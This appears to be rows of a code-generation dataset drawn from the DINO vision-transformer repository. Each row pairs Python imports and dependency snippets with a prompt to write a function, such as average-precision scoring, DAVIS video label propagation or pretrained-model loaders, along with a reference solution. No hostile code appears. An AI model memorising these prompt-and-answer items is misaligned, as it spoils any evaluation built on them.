from vision_transformer import DINOHead
def train_one_epoch(student, teacher, teacher_without_ddp, dino_loss, data_loader,
optimizer, lr_schedule, wd_schedule, momentum_schedule,epoch,
fp16_scaler, args):
metric_logger = utils.MetricLogger(delimiter=" ")
header = 'Epoch: [{}/{}]'.format(epoch, args.epochs)
for it, (images, _) in enumerate(metric_logger.log_every(data_loader, 10, header)):
# update weight decay and learning rate according to their schedule
it = len(data_loader) * epoch + it # global training iteration
for i, param_group in enumerate(optimizer.param_groups):
param_group["lr"] = lr_schedule[it]
if i == 0: # only the first group is regularized
param_group["weight_decay"] = wd_schedule[it]
# move images to gpu
images = [im.cuda(non_blocking=True) for im in images]
# teacher and student forward passes + compute dino loss
with torch.cuda.amp.autocast(fp16_scaler is not None):
teacher_output = teacher(images[:2]) # only the 2 global views pass through the teacher
student_output = student(images)
loss = dino_loss(student_output, teacher_output, epoch)
if not math.isfinite(loss.item()):
print("Loss is {}, stopping training".format(loss.item()), force=True)
sys.exit(1)
# student update
optimizer.zero_grad()
param_norms = None
if fp16_scaler is None:
loss.backward()
if args.clip_grad:
param_norms = utils.clip_gradients(student, args.clip_grad)
utils.cancel_gradients_last_layer(epoch, student,
args.freeze_last_layer)
optimizer.step()
else:
fp16_scaler.scale(loss).backward()
if args.clip_grad:
fp16_scaler.unscale_(optimizer) # unscale the gradients of optimizer's assigned params in-place
param_norms = utils.clip_gradients(student, args.clip_grad)
utils.cancel_gradients_last_layer(epoch, student,
args.freeze_last_layer)
fp16_scaler.step(optimizer)
fp16_scaler.update()
# EMA update for the teacher
with torch.no_grad():
m = momentum_schedule[it] # momentum parameter
for param_q, param_k in zip(student.module.parameters(), teacher_without_ddp.parameters()):
param_k.data.mul_(m).add_((1 - m) * param_q.detach().data)
# logging
torch.cuda.synchronize()
metric_logger.update(loss=loss.item())
metric_logger.update(lr=optimizer.param_groups[0]["lr"])
metric_logger.update(wd=optimizer.param_groups[0]["weight_decay"])
# gather the stats from all processes
metric_logger.synchronize_between_processes()
print("Averaged stats:", metric_logger)
return {k: meter.global_avg for k, meter in metric_logger.meters.items()}
class DINOLoss(nn.Module):
def __init__(self, out_dim, ncrops, warmup_teacher_temp, teacher_temp,
warmup_teacher_temp_epochs, nepochs, student_temp=0.1,
center_momentum=0.9):
super().__init__()
self.student_temp = student_temp
self.center_momentum = center_momentum
self.ncrops = ncrops
self.register_buffer("center", torch.zeros(1, out_dim))
# we apply a warm up for the teacher temperature because
# a too high temperature makes the training instable at the beginning
self.teacher_temp_schedule = np.concatenate((
np.linspace(warmup_teacher_temp,
teacher_temp, warmup_teacher_temp_epochs),
np.ones(nepochs - warmup_teacher_temp_epochs) * teacher_temp
))
def forward(self, student_output, teacher_output, epoch):
"""
Cross-entropy between softmax outputs of the teacher and student networks.
"""
student_out = student_output / self.student_temp
student_out = student_out.chunk(self.ncrops)
# teacher centering and sharpening
temp = self.teacher_temp_schedule[epoch]
teacher_out = F.softmax((teacher_output - self.center) / temp, dim=-1)
teacher_out = teacher_out.detach().chunk(2)
total_loss = 0
n_loss_terms = 0
for iq, q in enumerate(teacher_out):
for v in range(len(student_out)):
if v == iq:
# we skip cases where student and teacher operate on the same view
continue
loss = torch.sum(-q * F.log_softmax(student_out[v], dim=-1), dim=-1)
total_loss += loss.mean()
n_loss_terms += 1
total_loss /= n_loss_terms
self.update_center(teacher_output)
return total_loss
def update_center(self, teacher_output):
"""
Update center used for teacher output.
"""
batch_center = torch.sum(teacher_output, dim=0, keepdim=True)
dist.all_reduce(batch_center)
batch_center = batch_center / (len(teacher_output) * dist.get_world_size())
# ema update
self.center = self.center * self.center_momentum + batch_center * (1 - self.center_momentum)
class DataAugmentationDINO(object):
def __init__(self, global_crops_scale, local_crops_scale, local_crops_number):
flip_and_color_jitter = transforms.Compose([
transforms.RandomHorizontalFlip(p=0.5),
transforms.RandomApply(
[transforms.ColorJitter(brightness=0.4, contrast=0.4, saturation=0.2, hue=0.1)],
p=0.8
),
transforms.RandomGrayscale(p=0.2),
])
normalize = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
])
# first global crop
self.global_transfo1 = transforms.Compose([
transforms.RandomResizedCrop(224, scale=global_crops_scale, interpolation=Image.BICUBIC),
flip_and_color_jitter,
utils.GaussianBlur(1.0),
normalize,
])
# second global crop
self.global_transfo2 = transforms.Compose([
transforms.RandomResizedCrop(224, scale=global_crops_scale, interpolation=Image.BICUBIC),
flip_and_color_jitter,
utils.GaussianBlur(0.1),
utils.Solarization(0.2),
normalize,
])
# transformation for the local small crops
self.local_crops_number = local_crops_number
self.local_transfo = transforms.Compose([
transforms.RandomResizedCrop(96, scale=local_crops_scale, interpolation=Image.BICUBIC),
flip_and_color_jitter,
utils.GaussianBlur(p=0.5),
normalize,
])
def __call__(self, image):
crops = []
crops.append(self.global_transfo1(image))
crops.append(self.global_transfo2(image))
for _ in range(self.local_crops_number):
crops.append(self.local_transfo(image))
return crops
class DINOHead(nn.Module):
def __init__(self, in_dim, out_dim, use_bn=False, norm_last_layer=True, nlayers=3, hidden_dim=2048, bottleneck_dim=256):
super().__init__()
nlayers = max(nlayers, 1)
if nlayers == 1:
self.mlp = nn.Linear(in_dim, bottleneck_dim)
else:
layers = [nn.Linear(in_dim, hidden_dim)]
if use_bn:
layers.append(nn.BatchNorm1d(hidden_dim))
layers.append(nn.GELU())
for _ in range(nlayers - 2):
layers.append(nn.Linear(hidden_dim, hidden_dim))
if use_bn:
layers.append(nn.BatchNorm1d(hidden_dim))
layers.append(nn.GELU())
layers.append(nn.Linear(hidden_dim, bottleneck_dim))
self.mlp = nn.Sequential(*layers)
self.apply(self._init_weights)
self.last_layer = nn.utils.weight_norm(nn.Linear(bottleneck_dim, out_dim, bias=False))
self.last_layer.weight_g.data.fill_(1)
if norm_last_layer:
self.last_layer.weight_g.requires_grad = False
def _init_weights(self, m):
if isinstance(m, nn.Linear):
trunc_normal_(m.weight, std=.02)
if isinstance(m, nn.Linear) and m.bias is not None:
nn.init.constant_(m.bias, 0)
def forward(self, x):
x = self.mlp(x)
x = nn.functional.normalize(x, dim=-1, p=2)
x = self.last_layer(x)
return x
def train_dino(args):
utils.init_distributed_mode(args)
utils.fix_random_seeds(args.seed)
print("git:\n {}\n".format(utils.get_sha()))
print("\n".join("%s: %s" % (k, str(v)) for k, v in sorted(dict(vars(args)).items())))
cudnn.benchmark = True
# ============ preparing data ... ============
transform = DataAugmentationDINO(
args.global_crops_scale,
args.local_crops_scale,
args.local_crops_number,
)
dataset = datasets.ImageFolder(args.data_path, transform=transform)
sampler = torch.utils.data.DistributedSampler(dataset, shuffle=True)
data_loader = torch.utils.data.DataLoader(
dataset,
sampler=sampler,
batch_size=args.batch_size_per_gpu,
num_workers=args.num_workers,
pin_memory=True,
drop_last=True,
)
print(f"Data loaded: there are {len(dataset)} images.")
# ============ building student and teacher networks ... ============
# we changed the name DeiT-S for ViT-S to avoid confusions
args.arch = args.arch.replace("deit", "vit")
# if the network is a Vision Transformer (i.e. vit_tiny, vit_small, vit_base)
if args.arch in vits.__dict__.keys():
student = vits.__dict__[args.arch](
patch_size=args.patch_size,
drop_path_rate=args.drop_path_rate, # stochastic depth
)
teacher = vits.__dict__[args.arch](patch_size=args.patch_size)
embed_dim = student.embed_dim
# if the network is a XCiT
elif args.arch in torch.hub.list("facebookresearch/xcit:main"):
student = torch.hub.load('facebookresearch/xcit:main', args.arch,
pretrained=False, drop_path_rate=args.drop_path_rate)
teacher = torch.hub.load('facebookresearch/xcit:main', args.arch, pretrained=False)
embed_dim = student.embed_dim
# otherwise, we check if the architecture is in torchvision models
elif args.arch in torchvision_models.__dict__.keys():
student = torchvision_models.__dict__[args.arch]()
teacher = torchvision_models.__dict__[args.arch]()
embed_dim = student.fc.weight.shape[1]
else:
print(f"Unknow architecture: {args.arch}")
# multi-crop wrapper handles forward with inputs of different resolutions
student = utils.MultiCropWrapper(student, DINOHead(
embed_dim,
args.out_dim,
use_bn=args.use_bn_in_head,
norm_last_layer=args.norm_last_layer,
))
teacher = utils.MultiCropWrapper(
teacher,
DINOHead(embed_dim, args.out_dim, args.use_bn_in_head),
)
# move networks to gpu
student, teacher = student.cuda(), teacher.cuda()
# synchronize batch norms (if any)
if utils.has_batchnorms(student):
student = nn.SyncBatchNorm.convert_sync_batchnorm(student)
teacher = nn.SyncBatchNorm.convert_sync_batchnorm(teacher)
# we need DDP wrapper to have synchro batch norms working...
teacher = nn.parallel.DistributedDataParallel(teacher, device_ids=[args.gpu])
teacher_without_ddp = teacher.module
else:
# teacher_without_ddp and teacher are the same thing
teacher_without_ddp = teacher
student = nn.parallel.DistributedDataParallel(student, device_ids=[args.gpu])
# teacher and student start with the same weights
teacher_without_ddp.load_state_dict(student.module.state_dict())
# there is no backpropagation through the teacher, so no need for gradients
for p in teacher.parameters():
p.requires_grad = False
print(f"Student and Teacher are built: they are both {args.arch} network.")
# ============ preparing loss ... ============
dino_loss = DINOLoss(
args.out_dim,
args.local_crops_number + 2, # total number of crops = 2 global crops + local_crops_number
args.warmup_teacher_temp,
args.teacher_temp,
args.warmup_teacher_temp_epochs,
args.epochs,
).cuda()
# ============ preparing optimizer ... ============
params_groups = utils.get_params_groups(student)
if args.optimizer == "adamw":
optimizer = torch.optim.AdamW(params_groups) # to use with ViTs
elif args.optimizer == "sgd":
optimizer = torch.optim.SGD(params_groups, lr=0, momentum=0.9) # lr is set by scheduler
elif args.optimizer == "lars":
optimizer = utils.LARS(params_groups) # to use with convnet and large batches
# for mixed precision training
fp16_scaler = None
if args.use_fp16:
fp16_scaler = torch.cuda.amp.GradScaler()
# ============ init schedulers ... ============
lr_schedule = utils.cosine_scheduler(
args.lr * (args.batch_size_per_gpu * utils.get_world_size()) / 256., # linear scaling rule
args.min_lr,
args.epochs, len(data_loader),
warmup_epochs=args.warmup_epochs,
)
wd_schedule = utils.cosine_scheduler(
args.weight_decay,
args.weight_decay_end,
args.epochs, len(data_loader),
)
# momentum parameter is increased to 1. during training with a cosine schedule
momentum_schedule = utils.cosine_scheduler(args.momentum_teacher, 1,
args.epochs, len(data_loader))
print(f"Loss, optimizer and schedulers ready.")
# ============ optionally resume training ... ============
to_restore = {"epoch": 0}
utils.restart_from_checkpoint(
os.path.join(args.output_dir, "checkpoint.pth"),
run_variables=to_restore,
student=student,
teacher=teacher,
optimizer=optimizer,
fp16_scaler=fp16_scaler,
dino_loss=dino_loss,
)
start_epoch = to_restore["epoch"]
start_time = time.time()
print("Starting DINO training !")
for epoch in range(start_epoch, args.epochs):
data_loader.sampler.set_epoch(epoch)
# ============ training one epoch of DINO ... ============
train_stats = train_one_epoch(student, teacher, teacher_without_ddp, dino_loss,
data_loader, optimizer, lr_schedule, wd_schedule, momentum_schedule,
epoch, fp16_scaler, args)
# ============ writing logs ... ============
save_dict = {
'student': student.state_dict(),
'teacher': teacher.state_dict(),
'optimizer': optimizer.state_dict(),
'epoch': epoch + 1,
'args': args,
'dino_loss': dino_loss.state_dict(),
}
if fp16_scaler is not None:
save_dict['fp16_scaler'] = fp16_scaler.state_dict()
utils.save_on_master(save_dict, os.path.join(args.output_dir, 'checkpoint.pth'))
if args.saveckp_freq and epoch % args.saveckp_freq == 0:
utils.save_on_master(save_dict, os.path.join(args.output_dir, f'checkpoint{epoch:04}.pth'))
log_stats = {**{f'train_{k}': v for k, v in train_stats.items()},
'epoch': epoch}
if utils.is_main_process():
with (Path(args.output_dir) / "log.txt").open("a") as f:
f.write(json.dumps(log_stats) + "\n")
total_time = time.time() - start_time
total_time_str = str(datetime.timedelta(seconds=int(total_time)))
print('Training time {}'.format(total_time_str)) | null |
161,737 | import os
import sys
import pickle
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import models as torchvision_models
from torchvision import transforms as pth_transforms
from PIL import Image, ImageFile
import numpy as np
import utils
import vision_transformer as vits
from eval_knn import extract_features
The provided code snippet includes necessary dependencies for implementing the `score_ap_from_ranks_1` function. Write a Python function `def score_ap_from_ranks_1(ranks, nres)` to solve the following problem:
Compute the average precision of one search. ranks = ordered list of ranks of true positives nres = total number of positives in dataset
Here is the function:
def score_ap_from_ranks_1(ranks, nres):
""" Compute the average precision of one search.
ranks = ordered list of ranks of true positives
nres = total number of positives in dataset
"""
# accumulate trapezoids in PR-plot
ap = 0.0
# All have an x-size of:
recall_step = 1.0 / nres
for ntp, rank in enumerate(ranks):
# y-size on left side of trapezoid:
# ntp = nb of true positives so far
# rank = nb of retrieved items so far
if rank == 0:
precision_0 = 1.0
else:
precision_0 = ntp / float(rank)
# y-size on right side of trapezoid:
# ntp and rank are increased by one
precision_1 = (ntp + 1) / float(rank + 1)
ap += (precision_1 + precision_0) * recall_step / 2.0
return ap | Compute the average precision of one search. ranks = ordered list of ranks of true positives nres = total number of positives in dataset |
161,738 | import os
import sys
import pickle
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import models as torchvision_models
from torchvision import transforms as pth_transforms
from PIL import Image, ImageFile
import numpy as np
import utils
import vision_transformer as vits
from eval_knn import extract_features
def is_image_file(s):
ext = s.split(".")[-1]
if ext in ['jpg', 'jpeg', 'png', 'ppm', 'bmp', 'pgm', 'tif', 'tiff', 'webp']:
return True
return False | null |
161,739 | import os
import sys
import pickle
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import models as torchvision_models
from torchvision import transforms as pth_transforms
from PIL import Image, ImageFile
import numpy as np
import utils
import vision_transformer as vits
from eval_knn import extract_features
class ImgListDataset(torch.utils.data.Dataset):
def __init__(self, img_list, transform=None):
self.samples = img_list
self.transform = transform
def __getitem__(self, i):
with open(self.samples[i], 'rb') as f:
img = Image.open(f)
img = img.convert('RGB')
if self.transform is not None:
img = self.transform(img)
return img, i
def __len__(self):
return len(self.samples)
def extract_features(image_list, model, args):
transform = pth_transforms.Compose([
pth_transforms.Resize((args.imsize, args.imsize), interpolation=3),
pth_transforms.ToTensor(),
pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
])
tempdataset = ImgListDataset(image_list, transform=transform)
data_loader = torch.utils.data.DataLoader(tempdataset, batch_size=args.batch_size_per_gpu,
num_workers=args.num_workers, drop_last=False,
sampler=torch.utils.data.DistributedSampler(tempdataset, shuffle=False))
features = None
for samples, index in utils.MetricLogger(delimiter=" ").log_every(data_loader, 10):
samples, index = samples.cuda(non_blocking=True), index.cuda(non_blocking=True)
feats = model.get_intermediate_layers(samples, n=1)[0].clone()
cls_output_token = feats[:, 0, :] # [CLS] token
# GeM with exponent 4 for output patch tokens
b, h, w, d = len(samples), int(samples.shape[-2] / model.patch_embed.patch_size), int(samples.shape[-1] / model.patch_embed.patch_size), feats.shape[-1]
feats = feats[:, 1:, :].reshape(b, h, w, d)
feats = feats.clamp(min=1e-6).permute(0, 3, 1, 2)
feats = nn.functional.avg_pool2d(feats.pow(4), (h, w)).pow(1. / 4).reshape(b, -1)
# concatenate [CLS] token and GeM pooled patch tokens
feats = torch.cat((cls_output_token, feats), dim=1)
# init storage feature matrix
if dist.get_rank() == 0 and features is None:
features = torch.zeros(len(data_loader.dataset), feats.shape[-1])
if args.use_cuda:
features = features.cuda(non_blocking=True)
# get indexes from all processes
y_all = torch.empty(dist.get_world_size(), index.size(0), dtype=index.dtype, device=index.device)
y_l = list(y_all.unbind(0))
y_all_reduce = torch.distributed.all_gather(y_l, index, async_op=True)
y_all_reduce.wait()
index_all = torch.cat(y_l)
# share features between processes
feats_all = torch.empty(dist.get_world_size(), feats.size(0), feats.size(1),
dtype=feats.dtype, device=feats.device)
output_l = list(feats_all.unbind(0))
output_all_reduce = torch.distributed.all_gather(output_l, feats, async_op=True)
output_all_reduce.wait()
# update storage feature matrix
if dist.get_rank() == 0:
if args.use_cuda:
features.index_copy_(0, index_all, torch.cat(output_l))
else:
features.index_copy_(0, index_all.cpu(), torch.cat(output_l).cpu())
return features # features is still None for every rank which is not 0 (main) | null |
161,740 | import os
import glob
import sys
import argparse
import cv2
from tqdm import tqdm
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torchvision
from torchvision import transforms as pth_transforms
import numpy as np
from PIL import Image
import utils
import vision_transformer as vits
def parse_args():
parser = argparse.ArgumentParser("Generation self-attention video")
parser.add_argument(
"--arch",
default="vit_small",
type=str,
choices=["vit_tiny", "vit_small", "vit_base"],
help="Architecture (support only ViT atm).",
)
parser.add_argument(
"--patch_size", default=8, type=int, help="Patch resolution of the self.model."
)
parser.add_argument(
"--pretrained_weights",
default="",
type=str,
help="Path to pretrained weights to load.",
)
parser.add_argument(
"--checkpoint_key",
default="teacher",
type=str,
help='Key to use in the checkpoint (example: "teacher")',
)
parser.add_argument(
"--input_path",
required=True,
type=str,
help="""Path to a video file if you want to extract frames
or to a folder of images already extracted by yourself.
or to a folder of attention images.""",
)
parser.add_argument(
"--output_path",
default="./",
type=str,
help="""Path to store a folder of frames and / or a folder of attention images.
and / or a final video. Default to current directory.""",
)
parser.add_argument(
"--threshold",
type=float,
default=0.6,
help="""We visualize masks
obtained by thresholding the self-attention maps to keep xx percent of the mass.""",
)
parser.add_argument(
"--resize",
default=None,
type=int,
nargs="+",
help="""Apply a resize transformation to input image(s). Use if OOM error.
Usage (single or W H): --resize 512, --resize 720 1280""",
)
parser.add_argument(
"--video_only",
action="store_true",
help="""Use this flag if you only want to generate a video and not all attention images.
If used, --input_path must be set to the folder of attention images. Ex: ./attention/""",
)
parser.add_argument(
"--fps",
default=30.0,
type=float,
help="FPS of input / output video. Automatically set if you extract frames from a video.",
)
parser.add_argument(
"--video_format",
default="mp4",
type=str,
choices=["mp4", "avi"],
help="Format of generated video (mp4 or avi).",
)
return parser.parse_args() | null |
161,741 | import os
import copy
import glob
import queue
from urllib.request import urlopen
import argparse
import numpy as np
from tqdm import tqdm
import cv2
import torch
import torch.nn as nn
from torch.nn import functional as F
from PIL import Image
from torchvision import transforms
import utils
import vision_transformer as vits
def norm_mask(mask):
c, h, w = mask.size()
for cnt in range(c):
mask_cnt = mask[cnt,:,:]
if(mask_cnt.max() > 0):
mask_cnt = (mask_cnt - mask_cnt.min())
mask_cnt = mask_cnt/mask_cnt.max()
mask[cnt,:,:] = mask_cnt
return mask
def label_propagation(args, model, frame_tar, list_frame_feats, list_segs, mask_neighborhood=None):
"""
propagate segs of frames in list_frames to frame_tar
"""
## we only need to extract feature of the target frame
feat_tar, h, w = extract_feature(model, frame_tar, return_h_w=True)
return_feat_tar = feat_tar.T # dim x h*w
ncontext = len(list_frame_feats)
feat_sources = torch.stack(list_frame_feats) # nmb_context x dim x h*w
feat_tar = F.normalize(feat_tar, dim=1, p=2)
feat_sources = F.normalize(feat_sources, dim=1, p=2)
feat_tar = feat_tar.unsqueeze(0).repeat(ncontext, 1, 1)
aff = torch.exp(torch.bmm(feat_tar, feat_sources) / 0.1) # nmb_context x h*w (tar: query) x h*w (source: keys)
if args.size_mask_neighborhood > 0:
if mask_neighborhood is None:
mask_neighborhood = restrict_neighborhood(h, w)
mask_neighborhood = mask_neighborhood.unsqueeze(0).repeat(ncontext, 1, 1)
aff *= mask_neighborhood
aff = aff.transpose(2, 1).reshape(-1, h * w) # nmb_context*h*w (source: keys) x h*w (tar: queries)
tk_val, _ = torch.topk(aff, dim=0, k=args.topk)
tk_val_min, _ = torch.min(tk_val, dim=0)
aff[aff < tk_val_min] = 0
aff = aff / torch.sum(aff, keepdim=True, axis=0)
list_segs = [s.cuda() for s in list_segs]
segs = torch.cat(list_segs)
nmb_context, C, h, w = segs.shape
segs = segs.reshape(nmb_context, C, -1).transpose(2, 1).reshape(-1, C).T # C x nmb_context*h*w
seg_tar = torch.mm(segs, aff)
seg_tar = seg_tar.reshape(1, C, h, w)
return seg_tar, return_feat_tar, mask_neighborhood
def extract_feature(model, frame, return_h_w=False):
"""Extract one frame feature everytime."""
out = model.get_intermediate_layers(frame.unsqueeze(0).cuda(), n=1)[0]
out = out[:, 1:, :] # we discard the [CLS] token
h, w = int(frame.shape[1] / model.patch_embed.patch_size), int(frame.shape[2] / model.patch_embed.patch_size)
dim = out.shape[-1]
out = out[0].reshape(h, w, dim)
out = out.reshape(-1, dim)
if return_h_w:
return out, h, w
return out
def imwrite_indexed(filename, array, color_palette):
""" Save indexed png for DAVIS."""
if np.atleast_3d(array).shape[2] != 1:
raise Exception("Saving indexed PNGs requires 2D array.")
im = Image.fromarray(array)
im.putpalette(color_palette.ravel())
im.save(filename, format='PNG')
def read_frame(frame_dir, scale_size=[480]):
"""
read a single frame & preprocess
"""
img = cv2.imread(frame_dir)
ori_h, ori_w, _ = img.shape
if len(scale_size) == 1:
if(ori_h > ori_w):
tw = scale_size[0]
th = (tw * ori_h) / ori_w
th = int((th // 64) * 64)
else:
th = scale_size[0]
tw = (th * ori_w) / ori_h
tw = int((tw // 64) * 64)
else:
th, tw = scale_size
img = cv2.resize(img, (tw, th))
img = img.astype(np.float32)
img = img / 255.0
img = img[:, :, ::-1]
img = np.transpose(img.copy(), (2, 0, 1))
img = torch.from_numpy(img).float()
img = color_normalize(img)
return img, ori_h, ori_w
The provided code snippet includes necessary dependencies for implementing the `eval_video_tracking_davis` function. Write a Python function `def eval_video_tracking_davis(args, model, frame_list, video_dir, first_seg, seg_ori, color_palette)` to solve the following problem:
Evaluate tracking on a video given first frame & segmentation
Here is the function:
def eval_video_tracking_davis(args, model, frame_list, video_dir, first_seg, seg_ori, color_palette):
"""
Evaluate tracking on a video given first frame & segmentation
"""
video_folder = os.path.join(args.output_dir, video_dir.split('/')[-1])
os.makedirs(video_folder, exist_ok=True)
# The queue stores the n preceeding frames
que = queue.Queue(args.n_last_frames)
# first frame
frame1, ori_h, ori_w = read_frame(frame_list[0])
# extract first frame feature
frame1_feat = extract_feature(model, frame1).T # dim x h*w
# saving first segmentation
out_path = os.path.join(video_folder, "00000.png")
imwrite_indexed(out_path, seg_ori, color_palette)
mask_neighborhood = None
for cnt in tqdm(range(1, len(frame_list))):
frame_tar = read_frame(frame_list[cnt])[0]
# we use the first segmentation and the n previous ones
used_frame_feats = [frame1_feat] + [pair[0] for pair in list(que.queue)]
used_segs = [first_seg] + [pair[1] for pair in list(que.queue)]
frame_tar_avg, feat_tar, mask_neighborhood = label_propagation(args, model, frame_tar, used_frame_feats, used_segs, mask_neighborhood)
# pop out oldest frame if neccessary
if que.qsize() == args.n_last_frames:
que.get()
# push current results into queue
seg = copy.deepcopy(frame_tar_avg)
que.put([feat_tar, seg])
# upsampling & argmax
frame_tar_avg = F.interpolate(frame_tar_avg, scale_factor=args.patch_size, mode='bilinear', align_corners=False, recompute_scale_factor=False)[0]
frame_tar_avg = norm_mask(frame_tar_avg)
_, frame_tar_seg = torch.max(frame_tar_avg, dim=0)
# saving to disk
frame_tar_seg = np.array(frame_tar_seg.squeeze().cpu(), dtype=np.uint8)
frame_tar_seg = np.array(Image.fromarray(frame_tar_seg).resize((ori_w, ori_h), 0))
frame_nm = frame_list[cnt].split('/')[-1].replace(".jpg", ".png")
imwrite_indexed(os.path.join(video_folder, frame_nm), frame_tar_seg, color_palette) | Evaluate tracking on a video given first frame & segmentation |
161,742 | import os
import copy
import glob
import queue
from urllib.request import urlopen
import argparse
import numpy as np
from tqdm import tqdm
import cv2
import torch
import torch.nn as nn
from torch.nn import functional as F
from PIL import Image
from torchvision import transforms
import utils
import vision_transformer as vits
def read_frame_list(video_dir):
frame_list = [img for img in glob.glob(os.path.join(video_dir,"*.jpg"))]
frame_list = sorted(frame_list)
return frame_list | null |
161,743 | import os
import copy
import glob
import queue
from urllib.request import urlopen
import argparse
import numpy as np
from tqdm import tqdm
import cv2
import torch
import torch.nn as nn
from torch.nn import functional as F
from PIL import Image
from torchvision import transforms
import utils
import vision_transformer as vits
def to_one_hot(y_tensor, n_dims=None):
def read_seg(seg_dir, factor, scale_size=[480]):
seg = Image.open(seg_dir)
_w, _h = seg.size # note PIL.Image.Image's size is (w, h)
if len(scale_size) == 1:
if(_w > _h):
_th = scale_size[0]
_tw = (_th * _w) / _h
_tw = int((_tw // 64) * 64)
else:
_tw = scale_size[0]
_th = (_tw * _h) / _w
_th = int((_th // 64) * 64)
else:
_th = scale_size[1]
_tw = scale_size[0]
small_seg = np.array(seg.resize((_tw // factor, _th // factor), 0))
small_seg = torch.from_numpy(small_seg.copy()).contiguous().float().unsqueeze(0)
return to_one_hot(small_seg), np.asarray(seg) | null |
161,744 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_vits16` function. Write a Python function `def dino_vits16(pretrained=True, **kwargs)` to solve the following problem:
ViT-Small/16x16 pre-trained with DINO. Achieves 74.5% top-1 accuracy on ImageNet with k-NN classification.
Here is the function:
def dino_vits16(pretrained=True, **kwargs):
"""
ViT-Small/16x16 pre-trained with DINO.
Achieves 74.5% top-1 accuracy on ImageNet with k-NN classification.
"""
model = vits.__dict__["vit_small"](patch_size=16, num_classes=0, **kwargs)
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(
url="https://dl.fbaipublicfiles.com/dino/dino_deitsmall16_pretrain/dino_deitsmall16_pretrain.pth",
map_location="cpu",
)
model.load_state_dict(state_dict, strict=True)
return model | ViT-Small/16x16 pre-trained with DINO. Achieves 74.5% top-1 accuracy on ImageNet with k-NN classification. |
161,745 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_vits8` function. Write a Python function `def dino_vits8(pretrained=True, **kwargs)` to solve the following problem:
ViT-Small/8x8 pre-trained with DINO. Achieves 78.3% top-1 accuracy on ImageNet with k-NN classification.
Here is the function:
def dino_vits8(pretrained=True, **kwargs):
"""
ViT-Small/8x8 pre-trained with DINO.
Achieves 78.3% top-1 accuracy on ImageNet with k-NN classification.
"""
model = vits.__dict__["vit_small"](patch_size=8, num_classes=0, **kwargs)
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(
url="https://dl.fbaipublicfiles.com/dino/dino_deitsmall8_pretrain/dino_deitsmall8_pretrain.pth",
map_location="cpu",
)
model.load_state_dict(state_dict, strict=True)
return model | ViT-Small/8x8 pre-trained with DINO. Achieves 78.3% top-1 accuracy on ImageNet with k-NN classification. |
161,746 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_vitb16` function. Write a Python function `def dino_vitb16(pretrained=True, **kwargs)` to solve the following problem:
ViT-Base/16x16 pre-trained with DINO. Achieves 76.1% top-1 accuracy on ImageNet with k-NN classification.
Here is the function:
def dino_vitb16(pretrained=True, **kwargs):
"""
ViT-Base/16x16 pre-trained with DINO.
Achieves 76.1% top-1 accuracy on ImageNet with k-NN classification.
"""
model = vits.__dict__["vit_base"](patch_size=16, num_classes=0, **kwargs)
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(
url="https://dl.fbaipublicfiles.com/dino/dino_vitbase16_pretrain/dino_vitbase16_pretrain.pth",
map_location="cpu",
)
model.load_state_dict(state_dict, strict=True)
return model | ViT-Base/16x16 pre-trained with DINO. Achieves 76.1% top-1 accuracy on ImageNet with k-NN classification. |
161,747 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_vitb8` function. Write a Python function `def dino_vitb8(pretrained=True, **kwargs)` to solve the following problem:
ViT-Base/8x8 pre-trained with DINO. Achieves 77.4% top-1 accuracy on ImageNet with k-NN classification.
Here is the function:
def dino_vitb8(pretrained=True, **kwargs):
"""
ViT-Base/8x8 pre-trained with DINO.
Achieves 77.4% top-1 accuracy on ImageNet with k-NN classification.
"""
model = vits.__dict__["vit_base"](patch_size=8, num_classes=0, **kwargs)
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(
url="https://dl.fbaipublicfiles.com/dino/dino_vitbase8_pretrain/dino_vitbase8_pretrain.pth",
map_location="cpu",
)
model.load_state_dict(state_dict, strict=True)
return model | ViT-Base/8x8 pre-trained with DINO. Achieves 77.4% top-1 accuracy on ImageNet with k-NN classification. |
161,748 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_resnet50` function. Write a Python function `def dino_resnet50(pretrained=True, **kwargs)` to solve the following problem:
ResNet-50 pre-trained with DINO. Achieves 75.3% top-1 accuracy on ImageNet linear evaluation benchmark (requires to train `fc`).
Here is the function:
def dino_resnet50(pretrained=True, **kwargs):
"""
ResNet-50 pre-trained with DINO.
Achieves 75.3% top-1 accuracy on ImageNet linear evaluation benchmark (requires to train `fc`).
"""
model = resnet50(pretrained=False, **kwargs)
model.fc = torch.nn.Identity()
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(
url="https://dl.fbaipublicfiles.com/dino/dino_resnet50_pretrain/dino_resnet50_pretrain.pth",
map_location="cpu",
)
model.load_state_dict(state_dict, strict=False)
return model | ResNet-50 pre-trained with DINO. Achieves 75.3% top-1 accuracy on ImageNet linear evaluation benchmark (requires to train `fc`). |
161,749 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_xcit_small_12_p16` function. Write a Python function `def dino_xcit_small_12_p16(pretrained=True, **kwargs)` to solve the following problem:
XCiT-Small-12/16 pre-trained with DINO.
Here is the function:
def dino_xcit_small_12_p16(pretrained=True, **kwargs):
"""
XCiT-Small-12/16 pre-trained with DINO.
"""
model = torch.hub.load('facebookresearch/xcit:main', "xcit_small_12_p16", num_classes=0, **kwargs)
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(
